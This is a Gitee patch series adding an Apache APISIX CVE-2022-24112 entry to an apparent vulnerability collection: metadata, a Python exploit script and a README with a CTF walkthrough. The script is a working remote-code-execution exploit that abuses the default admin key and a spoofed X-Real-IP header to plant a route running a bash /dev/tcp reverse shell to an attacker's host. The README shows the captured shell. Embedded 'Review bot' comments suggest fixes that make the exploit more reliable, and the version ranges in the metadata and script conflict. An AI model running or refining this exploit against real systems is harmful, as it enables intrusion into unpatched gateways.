From c36f76ff1046e6100487e50bf1bf008f93c15ee2 Mon Sep 17 00:00:00 2001
From: zxengweihao
Date: Thu, 9 Mar 2023 03:57:40 +0000
Subject: [PATCH 1/7] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202022?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/apache/2022/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache/2022/.keep
diff --git a/cve/apache/2022/.keep b/cve/apache/2022/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 265fefbd80e457939df7c8cc4630b80aeff2199c Mon Sep 17 00:00:00 2001
From: zxengweihao
Date: Thu, 9 Mar 2023 03:57:50 +0000
Subject: [PATCH 2/7] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-24112?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/apache/2022/CVE-2022-24112/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache/2022/CVE-2022-24112/.keep
diff --git a/cve/apache/2022/CVE-2022-24112/.keep b/cve/apache/2022/CVE-2022-24112/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 2d3cb2066399aa4ba3cf37829b498a1c8557edf7 Mon Sep 17 00:00:00 2001
From: zxengweihao
Date: Thu, 9 Mar 2023 03:58:23 +0000
Subject: [PATCH 3/7] add CVE-2022-24112
Signed-off-by: zxengweihao
---
 .../2022/CVE-2022-24112/CVE-2022-24112.yaml | 20 +++
 .../CVE-2022-24112_Linux_by_twseptian.py | 88 +++++++++++++++++++
 cve/apache/2022/CVE-2022-24112/README.md | 22 +++
 3 files changed, 130 insertions(+)
 create mode 100644 cve/apache/2022/CVE-2022-24112/CVE-2022-24112.yaml
 create mode 100644 cve/apache/2022/CVE-2022-24112/CVE-2022-24112_Linux_by_twseptian.py
 create mode 100644 cve/apache/2022/CVE-2022-24112/README.md
diff --git a/cve/apache/2022/CVE-2022-24112/CVE-2022-24112.yaml b/cve/apache/2022/CVE-2022-24112/CVE-2022-24112.yaml
new file mode 100644
index 00000000..a04989dd
--- /dev/null
+++ b/cve/apache/2022/CVE-2022-24112/CVE-2022-24112.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-24112
+source: https://github.com/Acczdy/CVE-2022-24112_POC
+info:
+ name: Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
+ severity: critical
+ description: |
+ Apache APISIX apisix/batch-requests 插件允许将 X-REAL-IP 头覆盖为 RCE;攻击者可以滥用 batch-requests 插件发送请求以绕过 Admin API 的 IP 限制。 Apache APISIX 的默认配置(带有默认 API 密钥)容易受到远程代码执行的攻击。 当admin key 被改变或者Admin API 的端口被改变到与数据面板不同的端口时,影响会更小。 但是绕过Apache APISIX的数据面板的IP限制还是有风险的。 批处理请求插件中有一个检查,它用真实的远程 IP 覆盖客户端 IP。 但是由于代码中的错误,可以绕过此检查。
+ scope-of-influence:
+ apache apisix 2.10.4及其之前所有版本;2.11.0-2.12.1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/cve-2022-24112
+ - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2022-24112
+ cwe-id: CWE-290
+ cnvd-id:
+ kve-id:
+ tags: cve,cve2022,apache,rce,apisix
\ No newline at end of file
diff --git a/cve/apache/2022/CVE-2022-24112/CVE-2022-24112_Linux_by_twseptian.py b/cve/apache/2022/CVE-2022-24112/CVE-2022-24112_Linux_by_twseptian.py
new file mode 100644
index 00000000..a47586d8
--- /dev/null
+++ b/cve/apache/2022/CVE-2022-24112/CVE-2022-24112_Linux_by_twseptian.py
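Review bot: The `scope-of-influence` line (`apache apisix 2.10.4及其之前所有版本;2.11.0-2.12.1`) does not agree with the version range the shipped script declares in its header (`# Version: Apache APISIX 1.3 – 2.12.1`), and if I recall the vendor advisory correctly 2.10.4 and 2.12.1 are the patched releases rather than affected ones — this should be re-checked against the NVD entry already listed under `reference:` and the fixed versions stated explicitly. The `source:` field credits `Acczdy/CVE-2022-24112_POC`, yet the script added in the same commit carries `# Exploit Author: Ven3xy` and a `_by_twseptian` filename, so the recorded provenance does not match the artifact; point `source:` at the script's real origin or add a second entry. A short `# NOTE: relies on the default admin key; see description` next to `severity: critical` would also tell a reader why the rating is conditional on configuration, as the description text itself says.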
@@ -0,0 +1,88 @@
+# Exploit Title: Apache APISIX 2.12.1 - Remote Code Execution (RCE)
+# Date: 2022-03-16
+# Exploit Author: Ven3xy
+# Vendor Homepage: https://apisix.apache.org/
+# Version: Apache APISIX 1.3 – 2.12.1
+# Tested on: CentOS 7
+# CVE : CVE-2022-24112
+
+
+import requests
+import sys
+
+class color:
+ HEADER = '\033[95m'
+ IMPORTANT = '\33[35m'
+ NOTICE = '\033[33m'
+ OKBLUE = '\033[94m'
+ OKGREEN = '\033[92m'
+ WARNING = '\033[93m'
+ RED = '\033[91m'
+ END = '\033[0m'
+ UNDERLINE = '\033[4m'
+ LOGGING = '\33[34m'
+color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]
+
+
+def banner():
+ run = color_random[6]+'''\n . ,
+ _.._ * __*\./ ___ _ \./._ | _ *-+-
+ (_][_)|_) |/'\ (/,/'\[_)|(_)| |
+ | |
+\n'''
+ run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n'''
+ run3 = color_random[4]+'''{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n'''
+ run4 = '''POWERBY:M4xSec & only:chunqiuyunjing.com'''
+ print(run+run2+run3+run4)
+
+if (len(sys.argv) != 4):
+ banner()
+ print("[!] 
Usage : ./apisix-exploit.py ")
+ exit()
+
+else:
+ banner()
+ target_url = sys.argv[1]
+ lhost = sys.argv[2]
+ lport = sys.argv[3]
+
+headers1 = {
+ 'Host': target_url,
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
+ 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
+ 'Accept': '*/*',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Content-Type': 'application/json',
+ 'Content-Length': '540',
+ 'Connection': 'close',
+}
+
+headers2 = {
+ 'Host': target_url,
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
+ 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
+ 'Accept': '*/*',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Content-Type': 'application/json',
+ 'Connection': 'close',
+}
+
+json_data = {
+ 'headers': {
+ 'X-Real-IP': '127.0.0.1',
+ 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
+ 'Content-Type': 'application/json',
+ },
+ 'timeout': 1500,
+ 'pipeline': [
+ {
+ 'path': '/apisix/admin/routes/index',
+ 'method': 'PUT',
+ 'body': '{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute(\'bash -c \\\\\\"0<&160-;exec 160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&160 2>&160\\\\\\"\'); return true end"}',
+ },
+ ],
+}
+
+response1 = requests.post('http://'+target_url+'/apisix/batch-requests', headers=headers1, json=json_data, verify=False)
+
+response2 = requests.get('http://'+target_url+'/rms/fzxewh', headers=headers2, verify=False)
diff --git a/cve/apache/2022/CVE-2022-24112/README.md b/cve/apache/2022/CVE-2022-24112/README.md
new file mode 100644
index 00000000..f63768e9
--- /dev/null
+++ b/cve/apache/2022/CVE-2022-24112/README.md
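Review bot: `headers1` pins `'Content-Length': '540'` on the batch request while `requests` serializes `json_data` itself, so the real body length changes with `lhost`/`lport` and the hard-coded value will either truncate the JSON at the gateway or leave it waiting for bytes that never arrive; delete that entry and let `requests` compute it, as `headers2` already does. Neither response is inspected — `response1` and `response2` are assigned and discarded — so a changed admin key, a non-default Admin API port or a patched target fails silently; at minimum add `print(response1.status_code, response1.text)` after the first call and `print(response2.status_code)` after the second. The usage message `print("[!] Usage : ./apisix-exploit.py ")` names no arguments (the placeholders appear to have been lost, presumably as stripped angle brackets), and the README in this same commit documents `-t`/`-L`/`-P` flags that this script never parses (it reads bare `sys.argv[1..3]` and exits on any other count), so one of the two must change. The default key `edd1c9f034335f136f87ad84b625c8f1` is repeated three times; hoisting it into one constant or an optional fourth argument would make the "admin key changed" case described in the CVE metadata testable. Also `exit()` at module level should be `sys.exit(1)`, and `verify=False` on a plain `http://` URL is a no-op.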
@@ -0,0 +1,22 @@
+**CVE-2022-24112_Linux_by_twseptian.py**
+
+1. VPS开启监听:`nc -lvvp 18888`
+2. 进入POC目录运行:
+
+ **注意**:此处添加-t的数据时,不需要写入`http://`或`https://`,只需要域名+端口即可,如下
+ ```
+ python3 CVE-2022-24112_Linux_by_twseptian.py -t eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 -L VPS_IP -P VPS_PODRPODR
+ ```
+3. 返回查看VPS情况如下
+ ```
+ [root@root ~]# nc -lvvp 18888
+ Ncat: Version 7.50 ( https://nmap.org/ncat )
+ Ncat: Listening on :::18888
+ Ncat: Listening on 0.0.0.0:18888
+ Ncat: Connection from x.x.x.x.
+ Ncat: Connection from x.x.x.x:x.
+ id
+ uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
+ cat /flag
+ flag{0834f79f-5f40-4389-bce7-c64e969734c4}
+ ```
\ No newline at end of file
-- Gitee
From 41d2873fa5a6a116e4288e27f3a726133c9ec9cf Mon Sep 17 00:00:00 2001
From: zxengweihao
Date: Thu, 9 Mar 2023 04:06:32 +0000
Subject: [PATCH 4/7] add info in openkylin_list.yaml
Signed-off-by: zxengweihao
---
 openkylin_list.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 1c5bc747..25b02ac9 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -4,6 +4,7 @@ cve:
 - CVE-2020-9490
 - CVE-2021-41773
 - CVE-2021-42013
+ - CVE-2022-24112
 linux-kernel:
 - CVE-2021-4204
 - CVE-2021-22555
-- Gitee
From 47ebe64445d2aebbd0298d1231422a16fb1949f5 Mon Sep 17 00:00:00 2001
From: zxengweihao
Date: Thu, 9 Mar 2023 04:10:34 +0000
Subject: [PATCH 5/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache/2022/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/apache/2022/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache/2022/.keep
diff --git a/cve/apache/2022/.keep b/cve/apache/2022/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From de95745a101f13d1006c34a939278c9a299912bb Mon Sep 17 00:00:00 2001
From: zxengweihao
Date: Thu, 9 Mar 2023 04:10:55 +0000
Subject: [PATCH 6/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache/2022/CVE-2022-24112/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/apache/2022/CVE-2022-24112/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache/2022/CVE-2022-24112/.keep
diff --git a/cve/apache/2022/CVE-2022-24112/.keep b/cve/apache/2022/CVE-2022-24112/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From a55c61cb7b4c12c82264531b00f7c8ffba0bcfba Mon Sep 17 00:00:00 2001
From: zxengweihao
Date: Thu, 9 Mar 2023 14:14:00 +0000
Subject: [PATCH 7/7] =?UTF-8?q?=E5=9C=A8yaml=E4=B8=AD=E6=96=B0=E5=BB=BA?= =?UTF-8?q?=E5=88=97=E8=A1=A8apache=20apisix?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 openkylin_list.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 25b02ac9..45f23b4b 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -4,7 +4,6 @@ cve:
 - CVE-2020-9490
 - CVE-2021-41773
 - CVE-2021-42013
- - CVE-2022-24112
 linux-kernel:
 - CVE-2021-4204
 - CVE-2021-22555
@@ -49,6 +48,8 @@ cve:
 - CVE-2021-3517
 - CVE-2021-3518
 - CVE-2021-3537
+ apache apisix:
+ - CVE-2022-24112
 cnvd:
 kve:
 kylin-software-properties:
-- Gitee